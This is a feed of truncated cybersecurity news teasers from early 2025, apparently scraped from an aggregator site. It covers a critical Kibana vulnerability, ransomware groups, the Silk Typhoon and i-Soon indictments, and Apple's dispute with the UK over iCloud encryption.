Elastic has rolled out security updates to address a critical security flaw impacting the Kibana data visualization dashboard software for Elasticsearch that could result in arbitrary code execution. The vulnerability, tracked as CVE-2025-25012, carries a CVSS score of 9.9 out of a maximum of 10.0. It has been described as a case of prototype pollution. "Prototype pollution in Kibana leads to
The financially motivated threat actor known as EncryptHub has been observed orchestrating sophisticated phishing campaigns to deploy information stealers and ransomware, while also working on a new product called EncryptRAT. "EncryptHub has been observed targeting users of popular applications, by distributing trojanized versions," Outpost24 KrakenLabs said in a new report shared with The
Cyber threats are growing more sophisticated, and traditional security approaches struggle to keep up. Organizations can no longer rely on periodic assessments or static vulnerability lists to stay secure. Instead, they need a dynamic approach that provides real-time insights into how attackers move through their environment. This is where attack graphs come in. By mapping potential attack paths
The threat actors behind the Medusa ransomware have claimed nearly 400 victims since it first emerged in January 2023, with the financially motivated attacks witnessing a 42% increase between 2023 and 2024. In the first two months of 2025 alone, the group has claimed over 40 attacks, according to data from the Symantec Threat Hunter Team said in a report shared with The Hacker News. The
Journey with us to Myanmar's shadowy scam factories, where trafficked workers are forced to run romance-baiting and fake tech support scams, and find out why a company's mandatory hold time for tech support could lead to innocent users having their computers compromised. All this and more is discussed in the
latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault. Plus - don't miss our featured interview with Acronis CISO Gerald Beuchelt!
Source: www.techrepublic.com – Author: Fiona Jackson Apple told TechRepublic it is “gravely disappointed” to remove Advanced Data Protection in the U.K., as it fights government demands for an iCloud backdoor. Image: TheClimateGroup/Creative Commons (2014) Apple is taking legal action against the U.K. government over demands to weaken its strongest cloud security measures, arguing that compliance […] The post Why is Apple Taking Legal Action Against UK’s Government? – Source: www.techrepublic.com first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.techrepublic.com – Author: Megan Crouse The problem started with Manifest V3, Chrome’s new extension specification, which is supposed to improve privacy. Google’s latest crackdown on browser extensions has rendered popular ad blockers like uBlock Origin inoperable on Chrome, as the company pushes forward with its switch to Manifest V3. The move, which critics say […] The post Google Cuts Off uBlock Origin on Chrome as Firefox Stands Firm on Ad Blockers – Source: www.techrepublic.com first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: Ryan Naraine The US Justice Department on Wednesday unsealed indictments charging employees of a Chinese cybersecurity firm known as i-Soon (Anxun Information Technology) with conducting extensive hacking campaigns on behalf of Beijing’s security services. Prosecutors say i-Soon employees acted as “hackers-for-hire,” breaching email networks, government databases, and corporate systems at the […] The post US Indicts China’s iSoon ‘Hackers-for-Hire’ Operatives – Source: www.securityweek.com first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: Eduard Kovacs Many organizations are still concerned that patching operational technology (OT) systems can lead to equipment downtime and operational disruptions, and consequently they do not conduct regular patching, according to cyber-physical security firm TXOne Networks. The data comes from TXOne’s 2024 Annual OT/ICS Cybersecurity Report, which is based on a […] The post Organizations Still Not Patching OT Due to Disruption Concerns: Survey – Source: www.securityweek.com first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: Ryan Naraine SpecterOps, a security startup selling technology to secure Microsoft’s Active Directory (AD) and Azure AD deployments, has raised an unusually large $75 million Series B funding round to accelerate the growth of its BloodHound Enterprise platform. The company said the investment was led by Insight Partners. Venture capital outfits […] The post SpecterOps Scores $75M Series B to Scale BloodHound Enterprise Platform – Source: www.securityweek.com first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: Ryan Naraine Microsoft threat hunters warned Wednesday of a significant shift in tactics by Silk Typhoon, a Chinese government espionage group linked to recent US Treasury hacks. The group is now targeting companies in the global IT supply chain, including IT services, remote monitoring and management firms and managed service providers. […] The post China Hackers Behind US Treasury Breach Caught Targeting IT Supply Chain – Source: www.securityweek.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: Ionut Arghire Proofpoint warns of a highly targeted campaign targeting several United Arab Emirates organizations across multiple sectors with a new backdoor. The attacks, attributed to an Iranian threat actor tracked as UNK_CraftyCamel, employed polyglot files to hide the malicious payload, a technique relatively uncommon in espionage attacks. The threat actor, […] The post Iranian Hackers Target UAE Firms With Polyglot Files – Source: www.securityweek.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: Ionut Arghire A network of North Korean fake IT workers has been creating personas on GitHub to obtain remote engineering and full-stack blockchain developer positions in the US and Japan, threat monitoring firm Nisos warns. The GitHub personas, which are reusing matured GitHub accounts and portfolio content, claim to be in […] The post North Korean Fake IT Workers Pose as Blockchain Developers on GitHub – Source: www.securityweek.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: Eduard Kovacs The US Justice Department announced on Tuesday that two Venezuelan nationals were arrested and charged recently over their role in an ATM jackpotting scheme. In ATM jackpotting attacks, an ATM is hacked by installing a piece of malware on its hard drive or by replacing the drive with an […] The post Two Venezuelans Arrested in US for ATM Jackpotting – Source: www.securityweek.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.securityweek.com – Author: Ionut Arghire A ransomware gang has claimed responsibility for an attack on Indian engineering firm Tata Technologies, threatening to leak 1.4 terabytes of data allegedly stolen from the company. The data appears to have been stolen in an incident that the subsidiary of Tata Motors disclosed in a regulatory filing with […] The post Ransomware Group Claims Attack on Tata Technologies – Source: www.securityweek.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
On Feb. 3, 2025, a transformative STEM outreach event for more than 25 female students took place at Whirlpool’s manufacturing plant in Puducherry, India. The post Inspiring the Future: STEM Outreach Program for Young Female Students was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: securityaffairs.com – Author: Pierluigi Paganini Microsoft warns that China-backed APT Silk Typhoon, linked to the US Treasury hack, is now targeting global IT supply chains, using IT firms to spy and move laterally. Microsoft reported that China-linked APT group Silk Typhoon has shifted tactics to target IT solutions like remote management tools and cloud apps […] The post China-linked APT Silk Typhoon targets IT Supply Chain – Source: securityaffairs.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.techrepublic.com – Author: Fiona Jackson The Justice Department has charged 12 Chinese nationals for their alleged involvement in global hacker-for-hire activities. According to court documents, targets included the U.S. Treasury Department, journalists, and religious organisations. The attacks aimed to steal data and suppress free speech. The indictment names two officers […] The post DoJ Busts Alleged Global Hacking-for-Hire Network of ‘Cyber Mercenaries’ – Source: www.techrepublic.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.techrepublic.com – Author: TechRepublic Academy Published March 6, 2025 In this online training course, learn about NFTs, blockchain, decentralized apps, and more. […] The post Save 70% on a Course Showing You How to Invest in Crypto – Source: www.techrepublic.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: go.theregister.com – Author: Connor Jones Toronto Zoo’s final update on its January 2024 cyberattack arrived this week, revealing that visitor data going back to 2000 had been compromised. It said everyone who purchased a general admission ticket or zoo membership between 2000 and April 2023 had their personal data stolen by ransomware crooks in […] The post Toronto Zoo ransomware crooks snatch decades of visitor data – Source: go.theregister.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: go.theregister.com – Author: Connor Jones It will cost upward of $75 million to address the cybersecurity needs of rural US hospitals, Microsoft reckons, as mounting closures threaten the lives of Americans. Hospitals are routinely targeted by cybercriminals because system availability is acutely linked to mortality rates, and rural facilities are often the least secure […] The post Up to $75M needed to fix up rural hospital cybersecurity as ransomware gangs keep scratching at the door – Source: go.theregister.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: go.theregister.com – Author: Iain Thomson Eric Gan is no longer CEO of AI security biz Cybereason after what appears to have been a protracted and unpleasant fight with investors, including the SoftBank Vision Fund and Liberty Strategic Capital. Gan, a former SoftBank executive, came aboard as chief exec in April 2023 after the outfit’s […] The post Cybereason CEO leaves after months of boardroom blowups – Source: go.theregister.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: go.theregister.com – Author: Jessica Lyons US government agencies announced Wednesday criminal charges against alleged members of China’s Silk Typhoon gang, plus internet domain seizures linked to a long-term Chinese espionage campaign that saw Beijing hire miscreants to compromise US government agencies and other major orgs. “For years, the PRC government [People’s Republic of China] […] The post Feds name and charge alleged Silk Typhoon spies behind years of China-on-US attacks – Source: go.theregister.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: go.theregister.com – Author: Iain Thomson Looming staffing cuts to America’s security and intelligence agencies, if carried out, would “have a devastating effect on cybersecurity and our national security,” former NSA bigwig Rob Joyce has told House representatives. Speaking on Wednesday to the House Select Committee on the Chinese Communist Party, Joyce said the […] The post Ex-NSA grandee says Trump’s staff cuts will ‘devastate’ America’s national security – Source: go.theregister.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: go.theregister.com – Author: Connor Jones Qilin – the “no regrets” ransomware crew wreaking havoc on the global healthcare industry – just claimed responsibility for fresh attacks on a cancer treatment clinic in Japan and a women’s healthcare facility in the US. Qilin: We knew our Synnovis attack would cause a healthcare crisis at London […] The post Qilin ransomware gang boasts of cyberattacks on cancer clinic, Ob-Gyn facility – Source: go.theregister.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.